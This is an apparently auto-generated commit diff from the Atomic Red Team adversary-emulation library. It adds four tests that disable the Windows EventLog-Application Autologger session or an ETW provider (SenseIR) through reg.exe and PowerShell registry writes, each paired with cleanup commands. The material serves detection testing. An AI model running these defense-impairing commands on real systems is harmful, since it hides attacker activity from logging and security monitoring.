Generated docs from job=generate-docs branch=master [ci skip]

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1686-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1690-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

atomics/Indexes/Indexes-CSV/index.csv

@@ -524,6 +524,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Dis
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,51,Delete Microsoft Defender ASR Rules - InTune,eea0a6c2-84e9-4e8c-a242-ac585d28d0d1,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,52,Delete Microsoft Defender ASR Rules - GPO,0e7b8a4b-2ca5-4743-a9f9-96051abb6e50,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,53,AMSI Bypass - Create AMSIEnable Reg Key,728eca7b-0444-4f6f-ac36-437e3d751dc0,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable EventLog-Application Auto Logger Session Via Registry - Cmd,653c6e17-14a2-4849-851d-f1c0cc8ea9ab,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -368,6 +368,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper wit
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,51,Delete Microsoft Defender ASR Rules - InTune,eea0a6c2-84e9-4e8c-a242-ac585d28d0d1,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,52,Delete Microsoft Defender ASR Rules - GPO,0e7b8a4b-2ca5-4743-a9f9-96051abb6e50,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,53,AMSI Bypass - Create AMSIEnable Reg Key,728eca7b-0444-4f6f-ac36-437e3d751dc0,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable EventLog-Application Auto Logger Session Via Registry - Cmd,653c6e17-14a2-4849-851d-f1c0cc8ea9ab,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -650,6 +650,10 @@
   - Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune [windows]
   - Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO [windows]
   - Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key [windows]
+  - Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd [windows]
+  - Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
+  - Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
+  - Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -468,6 +468,10 @@
   - Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune [windows]
   - Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO [windows]
   - Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key [windows]
+  - Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd [windows]
+  - Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
+  - Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
+  - Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -23013,6 +23013,81 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+    - name: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
+      auto_generated_guid: 653c6e17-14a2-4849-851d-f1c0cc8ea9ab
+      description: This atomic simulates an activity where an attacker disables the
+        EventLog-Application ETW Auto Logger session using the reg.exe utility to
+        update the Windows registry value "Start". This would effectivly disable the
+        Event log application channel. The changes would only take effect after a
+        restart.
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
+          /v "Start" /t REG_DWORD /d "0" /f
+        cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
+          /v "Start" /t REG_DWORD /d "1" /f
+        name: command_prompt
+        elevation_required: true
+    - name: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
+      auto_generated_guid: da86f239-9bd3-4e85-92ed-4a94ef111a1c
+      description: This atomic simulates an activity where an attacker disables the
+        EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty"
+        cmdlet to update the Windows registry value "Start". This would effectivly
+        disable the Event log application channel. The changes would only take effect
+        after a restart.
+      supported_platforms:
+      - windows
+      executor:
+        command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
+          -Name Start -Value 0 -PropertyType "DWord" -Force
+        cleanup_command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
+          -Name Start -Value 1 -PropertyType "DWord" -Force
+        name: powershell
+        elevation_required: true
+    - name: Disable EventLog-Application ETW Provider Via Registry - Cmd
+      auto_generated_guid: 1cac9b54-810e-495c-8aac-989e0076583b
+      description: This atomic simulates an activity where an attacker disables a
+        specific ETW provider from the EventLog-Application ETW Auto Logger session
+        using the reg.exe utility to update the Windows registry value "Enabled".
+        This would effectivly remove that provider from the session and cause to not
+        emit any logs of that type. The changes would only take effect after a restart.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ETWProviderGUID:
+          type: string
+          default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
+          description: Microsoft-Windows-SenseIR ETW Provider GUID
+      executor:
+        command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          /v "Enabled" /t REG_DWORD /d "0" /f
+        cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          /v "Enabled" /t REG_DWORD /d "1" /f
+        name: command_prompt
+        elevation_required: true
+    - name: Disable EventLog-Application ETW Provider Via Registry - PowerShell
+      auto_generated_guid: 8f907648-1ebf-4276-b0f0-e2678ca474f0
+      description: This atomic simulates an activity where an attacker disables a
+        specific ETW provider from the EventLog-Application ETW Auto Logger session
+        using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry
+        value "Enabled". This would effectivly remove that provider from the session
+        and cause to not emit any logs of that type. The changes would only take effect
+        after a restart.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ETWProviderGUID:
+          type: string
+          default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
+          description: Microsoft-Windows-SenseIR ETW Provider GUID
+      executor:
+        command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          -Name Enabled -Value 0 -PropertyType "DWord" -Force
+        cleanup_command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          -Name Enabled -Value 1 -PropertyType "DWord" -Force
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -18934,6 +18934,81 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+    - name: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
+      auto_generated_guid: 653c6e17-14a2-4849-851d-f1c0cc8ea9ab
+      description: This atomic simulates an activity where an attacker disables the
+        EventLog-Application ETW Auto Logger session using the reg.exe utility to
+        update the Windows registry value "Start". This would effectivly disable the
+        Event log application channel. The changes would only take effect after a
+        restart.
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
+          /v "Start" /t REG_DWORD /d "0" /f
+        cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
+          /v "Start" /t REG_DWORD /d "1" /f
+        name: command_prompt
+        elevation_required: true
+    - name: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
+      auto_generated_guid: da86f239-9bd3-4e85-92ed-4a94ef111a1c
+      description: This atomic simulates an activity where an attacker disables the
+        EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty"
+        cmdlet to update the Windows registry value "Start". This would effectivly
+        disable the Event log application channel. The changes would only take effect
+        after a restart.
+      supported_platforms:
+      - windows
+      executor:
+        command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
+          -Name Start -Value 0 -PropertyType "DWord" -Force
+        cleanup_command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
+          -Name Start -Value 1 -PropertyType "DWord" -Force
+        name: powershell
+        elevation_required: true
+    - name: Disable EventLog-Application ETW Provider Via Registry - Cmd
+      auto_generated_guid: 1cac9b54-810e-495c-8aac-989e0076583b
+      description: This atomic simulates an activity where an attacker disables a
+        specific ETW provider from the EventLog-Application ETW Auto Logger session
+        using the reg.exe utility to update the Windows registry value "Enabled".
+        This would effectivly remove that provider from the session and cause to not
+        emit any logs of that type. The changes would only take effect after a restart.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ETWProviderGUID:
+          type: string
+          default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
+          description: Microsoft-Windows-SenseIR ETW Provider GUID
+      executor:
+        command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          /v "Enabled" /t REG_DWORD /d "0" /f
+        cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          /v "Enabled" /t REG_DWORD /d "1" /f
+        name: command_prompt
+        elevation_required: true
+    - name: Disable EventLog-Application ETW Provider Via Registry - PowerShell
+      auto_generated_guid: 8f907648-1ebf-4276-b0f0-e2678ca474f0
+      description: This atomic simulates an activity where an attacker disables a
+        specific ETW provider from the EventLog-Application ETW Auto Logger session
+        using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry
+        value "Enabled". This would effectivly remove that provider from the session
+        and cause to not emit any logs of that type. The changes would only take effect
+        after a restart.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ETWProviderGUID:
+          type: string
+          default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
+          description: Microsoft-Windows-SenseIR ETW Provider GUID
+      executor:
+        command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          -Name Enabled -Value 0 -PropertyType "DWord" -Force
+        cleanup_command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          -Name Enabled -Value 1 -PropertyType "DWord" -Force
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:

atomics/T1562.001/T1562.001.md

@@ -122,6 +122,14 @@ Additionally, adversaries may exploit legitimate drivers from anti-virus softwar
 
 - [Atomic Test #53 - AMSI Bypass - Create AMSIEnable Reg Key](#atomic-test-53---amsi-bypass---create-amsienable-reg-key)
 
+- [Atomic Test #54 - Disable EventLog-Application Auto Logger Session Via Registry - Cmd](#atomic-test-54---disable-eventlog-application-auto-logger-session-via-registry---cmd)
+
+- [Atomic Test #55 - Disable EventLog-Application Auto Logger Session Via Registry - PowerShell](#atomic-test-55---disable-eventlog-application-auto-logger-session-via-registry---powershell)
+
+- [Atomic Test #56 - Disable EventLog-Application ETW Provider Via Registry - Cmd](#atomic-test-56---disable-eventlog-application-etw-provider-via-registry---cmd)
+
+- [Atomic Test #57 - Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57---disable-eventlog-application-etw-provider-via-registry---powershell)
+
 
 <br/>
 
@@ -2287,4 +2295,142 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -F
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #54 - Disable EventLog-Application Auto Logger Session Via Registry - Cmd
+This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 653c6e17-14a2-4849-851d-f1c0cc8ea9ab
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "0" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "1" /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #55 - Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
+This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** da86f239-9bd3-4e85-92ed-4a94ef111a1c
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 0 -PropertyType "DWord" -Force
+```
+
+#### Cleanup Commands:
+```powershell
+New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 1 -PropertyType "DWord" -Force
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #56 - Disable EventLog-Application ETW Provider Via Registry - Cmd
+This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1cac9b54-810e-495c-8aac-989e0076583b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ETWProviderGUID | Microsoft-Windows-SenseIR ETW Provider GUID | string | {B6D775EF-1436-4FE6-BAD3-9E436319E218}|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "0" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "1" /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #57 - Disable EventLog-Application ETW Provider Via Registry - PowerShell
+This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8f907648-1ebf-4276-b0f0-e2678ca474f0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ETWProviderGUID | Microsoft-Windows-SenseIR ETW Provider GUID | string | {B6D775EF-1436-4FE6-BAD3-9E436319E218}|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 0 -PropertyType "DWord" -Force
+```
+
+#### Cleanup Commands:
+```powershell
+New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force
+```
+
+
+
+
+
 <br/>

atomics/T1562.001/T1562.001.yaml

@@ -1152,6 +1152,7 @@ atomic_tests:
     name: powershell
     elevation_required: true
 - name: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
+  auto_generated_guid: 653c6e17-14a2-4849-851d-f1c0cc8ea9ab
   description: This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
   supported_platforms:
   - windows
@@ -1161,6 +1162,7 @@ atomic_tests:
     name: command_prompt
     elevation_required: true
 - name: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
+  auto_generated_guid: da86f239-9bd3-4e85-92ed-4a94ef111a1c
   description: This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
   supported_platforms:
   - windows
@@ -1170,6 +1172,7 @@ atomic_tests:
     name: powershell
     elevation_required: true
 - name: Disable EventLog-Application ETW Provider Via Registry - Cmd
+  auto_generated_guid: 1cac9b54-810e-495c-8aac-989e0076583b
   description: This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
   supported_platforms:
   - windows
@@ -1184,6 +1187,7 @@ atomic_tests:
     name: command_prompt
     elevation_required: true
 - name: Disable EventLog-Application ETW Provider Via Registry - PowerShell
+  auto_generated_guid: 8f907648-1ebf-4276-b0f0-e2678ca474f0
   description: This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
   supported_platforms:
   - windows

atomics/used_guids.txt

@@ -1709,3 +1709,7 @@ fdac1f79-b833-4bab-b4a1-11b1ed676a4b
 b42c1f8c-399b-47ae-8fd8-763181395fee
 110b4281-43fe-405f-a184-5d8eaf228ebf
 4d61779d-be7f-425c-b560-0cafb2522911
+653c6e17-14a2-4849-851d-f1c0cc8ea9ab
+da86f239-9bd3-4e85-92ed-4a94ef111a1c
+1cac9b54-810e-495c-8aac-989e0076583b
+8f907648-1ebf-4276-b0f0-e2678ca474f0